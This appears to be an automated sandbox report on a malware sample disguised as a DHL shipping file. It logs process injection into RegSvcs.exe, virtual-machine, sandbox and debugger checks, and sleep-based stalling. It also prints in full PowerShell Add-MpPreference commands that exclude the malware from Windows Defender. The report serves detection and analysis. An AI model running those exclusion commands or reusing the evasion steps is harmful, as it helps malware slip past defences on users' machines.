                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara matchFile source: Process Memory Space: DHL_231437894819.bat.exe PID: 7972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: uvbIwIYe.exe PID: 7856, type: MEMORYSTR
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: DHL_231437894819.bat.exe, 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1534737744.0000000002C05000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: 1210000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: 2BC0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: 4BC0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: 7A00000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: 8A00000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: 8BB0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: 9BB0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: A590000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: B590000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: C590000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeMemory allocated: 1690000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeMemory allocated: 30C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeMemory allocated: 2EC0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeMemory allocated: 7910000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeMemory allocated: 8910000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeMemory allocated: 8AA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeMemory allocated: 9AA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeMemory allocated: A4D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeMemory allocated: B4D0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599889
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599763
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599655
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599539
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599421
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599312
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599189
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599062
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598953
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598843
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598734
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598624
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598507
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598389
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598277
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598157
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599449
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599124
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598905
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598685
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598547
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598436
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598328
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598218
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5473
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5376
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3361
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 5405
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1764
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8059
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe TID: 8000Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep count: 5473 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6148Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5780Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5620Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6872Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe TID: 2636Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99874
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99765
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99656
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99546
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99410
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99125
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98906
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98796
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98687
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98577
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98468
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98359
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98140
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98031
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97921
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97812
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97703
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97593
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97484
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97374
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97264
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97153
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97045
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96934
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96826
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96717
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96607
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99874
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99766
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99641
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99405
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 99063
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 98110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 97110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 96110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 95985
Source: RegSvcs.exe, 00000010.00000002.3853312298.0000000002E34000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware
Source: RegSvcs.exe, 00000010.00000002.3853312298.0000000002E34000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
Source: uvbIwIYe.exe, 0000000B.00000002.1560537386.000000000737C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: uvbIwIYe.exe, 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
Source: uvbIwIYe.exe, 0000000B.00000002.1560537386.000000000737C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: RegSvcs.exe, 0000000A.00000002.1539589797.0000000005FF8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3859197614.000000000626E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01177ED0 CheckRemoteDebuggerPresent, 10_2_01177ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe"
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uvbIwIYe.exe"
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe"
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uvbIwIYe.exe"
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AAA008
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe"
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uvbIwIYe.exe"
